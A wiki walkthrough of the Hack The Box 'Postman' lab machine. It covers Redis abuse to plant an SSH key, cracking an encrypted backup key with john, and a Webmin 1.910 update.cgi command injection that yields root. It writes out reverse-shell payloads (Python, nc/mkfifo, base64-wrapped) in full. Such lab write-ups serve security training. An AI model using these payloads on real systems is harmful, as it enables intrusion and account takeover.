From Luniwiki
Jump to: navigation, search



Ports scan

u505@kali:~/HTB/Machines/Postman$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-03-15 12:29:55 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on Discovered open port 6379/tcp on Discovered open port 10000/udp on Discovered open port 10000/tcp on Discovered open port 80/tcp on
u505@kali:~/HTB/Machines/Postman$ nmap -sC -sV
Starting Nmap 7.80 ( ) at 2020-03-15 08:30 EDT
Nmap scan report for postman.htb (
Host is up (0.86s latency).
Not shown: 997 closed ports
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 38.65 seconds
u505@kali:~/HTB/Machines/Postman$ nmap -sC -sV -p 6379
Starting Nmap 7.80 ( ) at 2020-03-15 08:36 EDT
Nmap scan report for postman.htb (
Host is up (0.040s latency).

PORT STATE SERVICE VERSION 6379/tcp open redis Redis key-value store 4.0.9
Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 6.58 seconds

Port 80


u505@kali:~/HTB/Machines/Postman$ python3 /opt/utils/dirsearch/ -w /usr/share/wordlists/dirb/common2.txt -e "js,html,txt" -f -t 50 -u

_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: js, html, txt | HTTP method: get | Threads: 50 | Wordlist size: 18379
Error Log: /opt/utils/dirsearch/logs/errors-20-03-15_08-41-45.log
[08:41:45] Starting: [08:41:49] 403 - 292B - /.html [08:42:00] 200 - 4KB - /css/ [08:42:06] 200 - 3KB - /fonts/ [08:42:09] 403 - 293B - /icons/ [08:42:09] 200 - 2KB - /images/ [08:42:09] 200 - 4KB - /index.html [08:42:10] 200 - 3KB - /js/ [08:42:23] 403 - 301B - /server-status/ [08:42:29] 200 - 8KB - /upload/
Task Completed

Nothing interesting here.

Port 10000

u505@kali:~/HTB/Machines/Postman$ searchsploit webmin 1.910
----------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                     |  Path
                                                                                   | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------- ----------------------------------------
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)             | exploits/linux/remote/46984.rb
----------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

There is an exploit for this version of Webmin, but it needs an authenticated user.

Port 6379

There are several vectors to abuse redis (

  • Get Webshell
  • Get Reverse Shell—Crontab
  • Get SSH–Crackit

Get Webshell

This vector consists copying a (php) file to the web server path. This method doesn't work, because the redis user doesn't have rights to write on folder /var/www/html

u505@kali:~/HTB/Machines/Postman$ redis-cli -h> config get dir
1) "dir"
2) "/var/lib/redis"> config set dir /var/www/html
OK> config set dbfilename redis.php
OK> set test "<?php phpinfo(); ?>"
OK> save
(error) ERR> config set dir /var/lib/redis

Get Reverse Shell—Crontab

This vector try to create a crontab file to open a reverse shell.

u505@kali:~/HTB/Machines/Postman$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( )
Ncat: Listening on :::4444
Ncat: Listening on
u505@kali:~/HTB/Machines/Postman$ echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h -x set 1
u505@kali:~/HTB/Machines/Postman$ redis-cli -h> config get dir
1) "dir"
2) "/var/lib/redis"> config set dir /var/spool/cron/crontabs/
(error) ERR Changing directory: Permission denied> config get dir
1) "dir"
2) "/var/lib/redis"

As expected from our previous attempt, this method doesn't work neither, because the redis user cannot write in folder /var/spool/cron/crontabs.

Get SSH–Crackit

This method try to push a ssh key to the server to gain access by ssh.

u505@kali:~/HTB/Machines/Postman$ ssh-keygen -t rsa -f postman
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in postman
Your public key has been saved in
The key fingerprint is:
SHA256:5WoRiY1eB6AMHnB9KFCikDDvs3un3EcIIxAzzMmJyHs u505@kali
The key's randomart image is:
+---[RSA 3072]----+
|^*B. ....        |
|B/.+o..+ o       |
|..+.o.o = o      |
| o.Eo. . =       |
|  +. o..S .      |
|   o  . .o       |
|  .    .o        |
|   o.....        |
|  ..oo..         |
u505@kali:~/HTB/Machines/Postman$ (echo -e "\n\n"; cat; echo -e "\n\n") > public.txt
u505@kali:~/HTB/Machines/Postman$ cat public.txt | redis-cli -h -x set crackit
u505@kali:~/HTB/Machines/Postman$ redis-cli -h> get crackit
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDhFUvl8fSLbgMtIXver1r5WscFfmthAs/CEknwXyjsOzdt5k9THjGB8OOfN1OlMzrtnh/nCCt9VyUbPNJcC6Xq6Gr9sO9r5TDFK3G/q1lWJcQB/nUvOW281A13NU0NF+lX+X/gI+SxMLmkEU29e0H3IZLfsAvodvVLJIDwPUBWPVqYG7ugEOG/NkrTOnSaXyjdcf+N/isJjBcXroC5mveo4k5hpE3kN6CUy65zjxgyNlHxgs+XStt5Pm7RyNndVNu8ZYprZ5OqfzUCms5JtEtR/pX66l41PG4Ex5YyzTO/9Gp9XDPFffe590RcTqPiwwHM3lmFgNsC6OOhO2JgJF7c8dsNe9L5Oa2572eZgAx/pQgakoTTPuzHK6BkKM2A7fv2vwk4CFZLNQAlVQ7gq0JGWXjfqA6IKFwLaak+WhNlJmsdrziaRAjaDELPnh9BNax1uTum3toIG9J2wpqdBwNAsNxEQF/dggoSAKsHfKGu8Tys1RNnJGPyKsdYF8uSh68= u505@kali\n\n\n\n"> config get dir
1) "dir"
2) "/var/lib/redis"> config set dir /var/lib/redis/.ssh
OK> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"> config set dbfilename "authorized_keys"
OK> config get dbfilename
1) "dbfilename"
2) "authorized_key"> save

If the file has been correctly written, we should access by ssh.

u505@kali:~/HTB/Machines/Postman$ ssh -i postman redis@
Enter passphrase for key 'postman':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

* Documentation: * Management: * Support:

* Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: Last login: Mon Aug 26 03:04:25 2019 from redis@Postman:~$ whoami redis

Lateral movement

The kernel is modern, and the user redis cannot execute sudo commands without password.

redis@Postman:~$ uname -a
Linux Postman 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
redis@Postman:~$ sudo -l
[sudo] password for redis:
Sorry, try again.
[sudo] password for redis:
Sorry, try again.
[sudo] password for redis:
sudo: 3 incorrect password attempts


redis@Postman:~$ cat .bash_history
su Matt
cat /etc/ssh/sshd_config
su Matt
cd /var/lib/redis
su Matt
cat id_rsa.bak
ls -la
cat id_rsa.bak
ls -la
crontab -l
systemctl enable redis-server
netstat -a
netstat -a
netstat -a
netstat -a
netstat -a > txt
crontab -l
cd ~/
nano 6379

Upload pspy64 and

u505@kali:~/HTB/Machines/Postman$ cd utils/
u505@kali:~/HTB/Machines/Postman/utils$ scp -i ../postman pspy64 redis@
Enter passphrase for key '../postman':
pspy64                                                                                    100% 3006KB   4.3MB/s   00:00                                                                                100%   46KB   1.1MB/s   00:00

The tool pspy64 doesn't show any scheduled job.

redis@Postman:/tmp$ chmod +x pspy64
redis@Postman:/tmp$ ./
[-] Location and Permissions (if accessible) of .bak file(s):
-rwxr-xr-x 1 Matt Matt 1743 Aug 26  2019 /opt/id_rsa.bak
-rw------- 1 root root 695 Aug 25  2019 /var/backups/group.bak
-rw------- 1 root shadow 577 Aug 25  2019 /var/backups/gshadow.bak
-rw------- 1 root shadow 935 Aug 26  2019 /var/backups/shadow.bak
-rw------- 1 root root 1382 Aug 25  2019 /var/backups/passwd.bak

LinEnum find the file id_rsa.bak from the bash_history

Private key

u505@kali:~/HTB/Machines/Postman$ scp -i postman redis@postman:/opt/id_rsa.bak matt
The authenticity of host 'postman (' can't be established.
ECDSA key fingerprint is SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'postman' (ECDSA) to the list of known hosts.
Enter passphrase for key 'postman':
id_rsa.bak                                                                                100% 1743    42.2KB/s   00:00

The private key is encrypted.

u505@kali:~/HTB/Machines/Postman$ head -n 7 matt
Proc-Type: 4,ENCRYPTED

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2 7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6

We force brute the key with john.

u505@kali:~/HTB/Machines/Postman$ /usr/share/john/ matt > matt.hash
u505@kali:~/HTB/Machines/Postman$ john matt.hash -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (matt)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:05 DONE (2020-03-15 10:22) 0.1845g/s 2646Kp/s 2646Kc/s 2646KC/s *7¡Vamos!
Session completed

We ssh with the user matt.

u505@kali:~/HTB/Machines/Postman$ chmod 600 matt
u505@kali:~/HTB/Machines/Postman$ ssh -i matt matt@postman
Enter passphrase for key 'matt':
Connection closed by port 22

But the server closes our session :( If we check sshd_config, we find that the user Matt has been denied to ssh the server.

redis@Postman:/tmp$ tail -n 20 /etc/ssh/sshd_config
#VersionAddendum none

#deny users DenyUsers Matt
# no default banner path #Banner none
# Allow client to pass locale environment variables AcceptEnv LANG LC_*
# override default of no subsystems Subsystem sftp /usr/lib/openssh/sftp-server
# Example of overriding settings on a per-user basis #Match User anoncvs # X11Forwarding no # AllowTcpForwarding no # PermitTTY no # ForceCommand cvs server

User flag

The ssh is not available, but we try to su the user Matt trying the same password than the private key.

redis@Postman:/tmp$ su Matt
Matt@Postman:/tmp$ whoami
Matt@Postman:/tmp$ cd
Matt@Postman:~$ cat user.txt

Escalation of privileges

Reusing Matt credentials, we access Webmin.


There is an metasploit module to gain a shell with the vulnerability previously screened. But it can be done manually. Reading the paper Webmin 1.910 - Remote Code Execution using BurpSuite, we can run commands with the update cgi.

Prepare the payload

The netcat on the server doesn't allow the switch -e, so we need the alternative command for the nc.

u505@kali:~/HTB/Machines/Postman$ echo -n "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f" > payload.1
u505@kali:~/HTB/Machines/Postman$ cat payload.1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

We transform these commands on base 64 format.

u505@kali:~/HTB/Machines/Postman$ cat payload.1 | base64 -w 0 > payload.b64
u505@kali:~/HTB/Machines/Postman$ cat payload.b64

The payload is wrapped with the base64 decoding.

u505@kali:~/HTB/Machines/Postman$ echo " | bash -c \"{echo,`cat`}|{base64,-d}|{bash,-i}\"" > payload.raw
u505@kali:~/HTB/Machines/Postman$ cat payload.raw
 | bash -c "{echo,cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMTo0NDQ0Iik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Oyc=}|{base64,-d}|{bash,-i}"

The payload is URL encoded.

u505@kali:~/HTB/Machines/Postman$ . /opt/utils/urlencode/
u505@kali:~/HTB/Machines/Postman$ urlencode "`cat payload.raw`" > payload.url
u505@kali:~/HTB/Machines/Postman$ cat payload.url

Open the listener

u505@kali:~/HTB/Machines/Postman$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( )
Ncat: Listening on :::4444
Ncat: Listening on

Update package and tamper the request

We browse to Software package update screen, and we intercept the request with Burp.


We intercept the update.cgi request.


We modify the content with with u=acl%2Fapt&u= and our payload


The root reverse shell is opened.

u505@kali:~/HTB/Machines/Postman$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
python -c 'import pty; pty.spawn("/bin/bash")'
root@Postman:/usr/share/webmin/package-updates/# stty raw -echo
stty raw -echo


Root flag

root@Postman:/usr/share/webmin/package-updates/# cat /root/root.txt


Daniel Simao 13:10, 15 March 2020 (EDT)